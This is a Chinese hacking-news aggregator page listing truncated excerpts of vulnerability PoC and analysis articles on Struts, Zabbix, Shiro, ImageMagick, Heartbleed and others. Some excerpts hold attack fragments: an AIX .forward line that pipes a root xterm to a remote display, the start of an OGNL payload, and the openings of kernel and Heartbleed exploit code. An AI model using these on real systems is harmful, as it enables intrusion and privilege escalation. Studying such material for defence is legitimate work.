记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

英特尔管理引擎JTAG缺陷PoC发布

“God Mode”需要特殊的USB调试连接器去年有一组安全研究人员发现了危害英特尔管理引擎,而这组人员刚刚又发布了针对现已修补漏洞的POC代码。 Positive Technologies的马克•埃尔莫洛夫马克西姆•戈里亚奇发表了一篇详细的解释,介绍如何访问英特尔的管理引擎(IME)特性,这项特性被称为联合测试行动组(JTAG),而它是通过USB对处理器进行调试访问。PoC结合了该公司另一位研究员德米特里•斯克利亚罗夫的工作研究。 PoC代码不会对英特尔系统构成重大的安全威胁,因为这其中存在一个补丁,而且POC代码需要通过USB进行物理访问。POC代码这一特性也提醒人们针对IME扩展硬件攻击面,而
发布时间:2018-09-07 12:20 | 阅读:66328 | 评论:0 | 标签:漏洞 Intel JTAGL漏洞 POC

360 Vulpecker Team:BlueBorne蓝牙漏洞深入分析与PoC

0×00 前些天,armis爆出了一系列蓝牙的漏洞,无接触无感知接管系统的能力有点可怕,而且基本上影响所有的蓝牙设备,危害不可估量,可以看这里(https://www.armis.com/blueborne/ )来了解一下它的逆天能力:只要手机开启了蓝牙,就可能被远程控制。现在手机这么多,利用这个漏洞写出蠕虫化的工具,那么可能又是一个手机版的低配wannacry了。我们360Vulpecker Team在了解到这些相关信息后,快速进行了跟进分析。 armis给出了他们的whitepaper,对蓝牙架构和这几个漏洞的分析可以说非常详尽了,先膜一发。不过他们没有给出这些漏洞的PoC或者是exp,只给了一个针对Android的“BlueBorne检测app”,但是逆向这个发现仅仅是检测了系
发布时间:2017-10-07 16:20 | 阅读:194147 | 评论:0 | 标签:终端安全 BlueBorne poc 蓝牙漏洞 漏洞

Struts 2 S2-053漏洞分析(附POC)

漏洞概述 漏洞类型 远程代码执行漏洞 CVE-ID CVE-2017-1000112 危害等级 高危 影响版本 Struts 2.0.1Struts 2.3.33Struts 2.5 – Struts 2.5.10 漏洞危害 当开发者在Freemarker标签中使用如下代码时<@s.hidden name=”redirectUri” value=redirectUri /><@s.hidden name=”redirectUri” value=”${redirectUri}” />Freemarker会将值当做表达式进行执行,最后导致代码执行。 poc示例 %{(#dm=@ognl.OgnlCo
发布时间:2017-09-17 21:45 | 阅读:80748 | 评论:0 | 标签:漏洞 poc Struts 2 S2-053

Use MSBuild To Do More

0x00 前言 最近Casey Smith@subTee更新了一系列关于”MSBuild”的研究进展,对我有很大启发。 本文将基于他公开的POC,并结合我的研究心得,介绍以下MSBuild的应用技巧: Execute PowerShell Commands Execute PE file Execute Shellcode VisualStudio Persistence 0x01 简介 MSBuild是Microsoft Build Engine的缩写,代表Microsoft和Visual Studio的新的生成平台 MSBuild可在未安装Visual Studio的环境中编译.net的工程文件 MSBuild可编译特定格式的xml文件 更多基本知识可参照以下链接: https://msdn.micro
发布时间:2016-10-12 06:05 | 阅读:101935 | 评论:0 | 标签:系统安全 mimikatz MSBuild poc powershell shellcode

如何构造Office漏洞POC(以CVE-2012-0158为例)

* 本文原创作者:维一零,本文属FreeBuf原创奖励计划,未经许可禁止转载近年来APT追踪盛行,常常可见各种以钓鱼开始的攻击,既有网站挂马式钓鱼,也有鱼叉式邮件钓鱼,本文所示的office漏洞CVE-2012-0158就凭借其经典、通用又稳定的漏洞利用经常出现在各种报告中,下面就来详细的讲解这个漏洞的原理,以及如何基于原理手动构造出可利用的POC样本,给大家弹一个计算器瞅瞅。漏洞原理关于本漏洞原理,网上有各种分析文章,一般都基于实例样本来定位漏洞的二进制代码并分析原理,这里不作详细的分析过程,直接给出漏洞成因,后面也有少部分的调试演示。这个漏洞发生在office的一个组件MSCOMCTL.OCX,多个版本office的该模块都存在这个漏洞,本文的测试环境均以WINXP+office200
发布时间:2016-09-10 22:15 | 阅读:122905 | 评论:0 | 标签:系统安全 CVE-2012-0158 office poc 漏洞

Drupal Coder模块命令执行漏洞分析

0x01:前言 这个漏洞是drupal的coder模块中,对dir参数没有过滤,导致的命令执行,其实挺早就看到这个洞了,一直也没时间去写,现在已经不新鲜了,安恒的博客上分析已经有了,他们是从poc角度分析的,我这里就对这个漏洞从网站代码的角度详细说一下。 0x02:漏洞分析 在文件sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php中 一开始就对$path进行赋值,下面所有的操作都是跟$path有关的,我们来看看$path是怎么来的,跟进extract_arguments()函数 发现$path其实是$_GET[‘file’],这个file参数是我们可控的,看看$path接下来怎么用到了,接着看 这里代码的本意应该是取一个已
发布时间:2016-08-24 23:40 | 阅读:119135 | 评论:0 | 标签:代码审计 Coder Drupal Drupal漏洞 poc 模块命令执行 漏洞分析 漏洞

zabbix高危SQL注入漏洞分析

0x01 漏洞概述 zabbix是一个开源的企业级性能监控解决方案。近日,zabbix的jsrpc的profileIdx2参数存在insert方式的SQL注入漏洞,攻击者无需授权登陆即可登陆zabbix管理系统,也可通过script等功能轻易直接获取zabbix服务器的操作系统权限。 但是无需登录注入这里有个前提,就是zabbix开启了guest权限。而在zabbix中,guest的默认密码为空。需要有这个条件的支持才可以进行无权限注入。 详情:《漏洞预警:Zabbix高危SQL注入漏洞,可获取系统权限》 0x02 影响程度 攻击成本:低 危害程度:高 是否登陆:不需要 影响版本:2.2.x,3.0.0-3.0.3 0x03 漏洞测试 在zabbix的地址后面添加: 利用方式一 如果出现下列代码则证明
发布时间:2016-08-19 11:20 | 阅读:111670 | 评论:0 | 标签:Web安全 exp poc profileIdx2 SQl Zabbix 注入漏洞 漏洞分析 漏洞测试 高危 注入 漏洞

无回显命令执行PoC编写方法(Apache Shiro Java反序列化)

概要 前段时间Mottoin发布了《Apache Shiro Java 反序列化漏洞分析》的文章 Apache Shiro 是 Apache 软件基金会的顶级项目,在 Java 应用中首选的授权验证、授权、密码学和会话管理框架。 近日 Apache Shiro 的 JIRA 中提到 Shrio 中的 Cookie 管理存在安全问题,在场景合适的情况下,攻击者可以通过控制本地的Cookie 内容导致 Getshell ,最终获取应用服务器控制权限。 今天就讲讲Apache Shiro Java反序列化无回显命令执行PoC编写方法 无回显 命令成功执行与否,无法从web获取到标志性的信息,Java反序列化漏洞即属于该类型。 验证方法 针对无回显的命令执行漏洞,让目标机执行wget、nc或者curl等命令,然后在公网
发布时间:2016-08-14 22:35 | 阅读:127783 | 评论:0 | 标签:Web安全 Apache Shiro CloudEye Java反序列化 Payload poc seebug 无回显命

初探Windows Fuzzing神器—-Winafl

这是一篇客座文章,作者是乌云二进制漏洞挖掘白帽子 k0shl 。其实上个月17号,本文就已经写完了,但是我们一直“捂”到了今天。算是给二进制方向的白帽子的七夕礼物吧 : ) 0x01 什么是winafl 其实说的afl-fuzz大家都不会很陌生,afl-fuzz是Linux用于fuzz文件格式,协议等二进制漏洞的神器,而winafl则是afl-fuzz的Windows版,最近我对winafl进行了一些浅层研究,由于之前也进行过一段时间的二进制漏洞挖掘,但基本上都是停留在手工挖掘上,越发觉得自动化神器功能的强大,也为以后自己开发fuzz工具提供了很重要的指导依据。   Winafl到底是什么? Winafl是windows下一种挖掘文件格式,协议漏洞的半自动化工具,为什么说半自动化呢,因为针对特定的软件
发布时间:2016-08-14 13:15 | 阅读:175111 | 评论:0 | 标签:系统安全 afl-fuzz DynamoRIO Fuzz IDA k0shl lstrcpyA memcpy OLLYD

Imagetragick 补丁绕过再次命令执行

##心情杂谈 哎哎哎,老司机一言不合就爆洞啊,这个洞在之前分析CVE-2016-3714的时候也发现了,结果被捂烂了…心塞塞~那我就写一下当时是怎么发现怎么这个洞… ##漏洞分析正文 之前在分析CVE-2016-3714的时候想,system()函数处理有问题,那么其他类似的有哪些函数呢? 下面是一个可以执行命令的函数列表: system() popen() fork()+exec() execl() 那么搜索一下调用system()函数有哪些地方?经过搜索的话,最终只有CVE-2016-3714这个漏洞点调用到了一个system(). 那这么接下来搜索一下popen()函数调用点 文件:magick/blob.c:2503行 #if defined(SIGPIPE) if
发布时间:2016-05-31 13:45 | 阅读:100770 | 评论:0 | 标签:文章 CVE-2016-3714 ImageMagick imagemagick命令执行 imagemagick漏洞 i

一万两千个PoC背后隐藏的信息

近期,来自威胁情报公司Recorded Future的安全研究人员开展了一项有趣的研究,研究的对象是关于发布在网络上的PoC exploits(例如通过Twitter以及链接到个人博客、GitHub或者Pastebin的论坛等)。PoC通常是由攻击者或安全研究人员进行开发,然后发布出来,从而来验证某个安全漏洞的存在以及如何利用这个漏洞。在一些案例中,黑客通过发布PoC来推动对应产品厂商开发修复加固补丁。而在本次研究中,从2015年3月22日至今,统计发现公布于网上的PoC达12,000个,而这个数字相比于2014年增加了2倍。PoC的传播平台根据研究表明, PoC主要还是通过社交媒体进行传播的(数量占据了各个传播平台总和的97%),比如通过Twitter。剩下的,主要为通过代码托管平台来进
发布时间:2016-05-11 13:30 | 阅读:82953 | 评论:0 | 标签:观点 poc 传播 目标

Elasticsearch目录遍历漏洞(CVE-2015-5531)复现与分析(附PoC)

0×01. elasticsearch 简介Elasticsearch是荷兰Elasticsearch公司的一套基于全文搜索引擎Apache Lucene构建的开源分布式RESTful搜索引擎,它主要用于云计算中,并支持通过HTTP使用JSON进行数据索引。Elasticsearch使用Lucene作为内部引擎,在其基础上封装了功能强大的RESTful API,让你不需要了解背后复杂的逻辑,即可完成搜索……详情请参见elstic.co。0×02. 漏洞概况漏洞发布时间:2015-07-21 00:00:00漏洞类型:路径遍历漏洞影响版本:1.0.0 – 1.6.0攻击路径:远程漏洞产生原因:源于程序没有充分过滤用户提交的输入,远程攻击者可借助目录遍历字符‘.
发布时间:2016-03-29 19:55 | 阅读:115196 | 评论:0 | 标签:漏洞 CVE-2015-5531 Elasticsearch 目录遍历漏洞 poc 分析 复现

[+] Linux Kernel +3.8 0day PoC [+]

/* https://gist.github.com/PerceptionPointTeam/18b1e86d1c0f8531ff8f */ /* $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall */ /* $ ./cve_2016_072 PP_KEY */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <keyutils.h> #include <unistd.h> #include <time.h> #
发布时间:2016-01-21 01:00 | 阅读:104247 | 评论:0 | 标签:Linux/Unix 0day Kernel Linux poc

Java反序列化漏洞详解

阅读: 16Java反序列化漏洞从爆出到现在快2个月了,已有白帽子实现了jenkins,weblogic,jboss等的代码执行利用工具。本文对于Java反序列化的漏洞简述后,并对于Java反序列化的Poc进行详细解读。 Java反序列化漏洞简介Java序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中,Java中的ObjectOutputStream类的writeObject()方法可以实现序列化。Java反序列化即逆过程,由字节流还原成对象。ObjectInputStream类的readObject()方法用于反序列化。因此要利用Java反序列化漏洞,需要在进行反序列化的地方传入攻击者的序列化代码。能符合以上条件的地方即存在漏洞。Java反序列化Poc详解public class test {p
发布时间:2015-12-26 20:25 | 阅读:143279 | 评论:0 | 标签:漏洞分析 java反序列化 java反序列化漏洞 Poc jboss 白帽子 漏洞详解 漏洞

openssl漏洞POC工具

#!/usr/bin/python # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) # The author disclaims copyright to this source code. import sys import struct import socket import time import select import re from optparse import OptionParser options = OptionParser(usage='%prog server [options]', description='Te
发布时间:2014-04-08 19:17 | 阅读:135766 | 评论:0 | 标签:openssh poc

CVE-2012-2200

IBM AIX是一款商业操作系统。IBM AIX在处理用户$HOME/.forward文件中某些结构时存在错误,允许本地攻击者利用漏洞以root特权执行任意代码。Advisory: http://aix.software.ibm.com/aix/efixes/security/sendmail1_advisory.asc CVE-2012-2200POC:rootbsd@aix $ echo ""|/usr/bin/X11/xterm -display laptop:0"" > .forwardrootbsd@aix $ chmod 600 .forwardrootbsd@aix $ mail toot < /de
发布时间:2013-01-13 02:25 | 阅读:62177 | 评论:0 | 标签:PoC

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词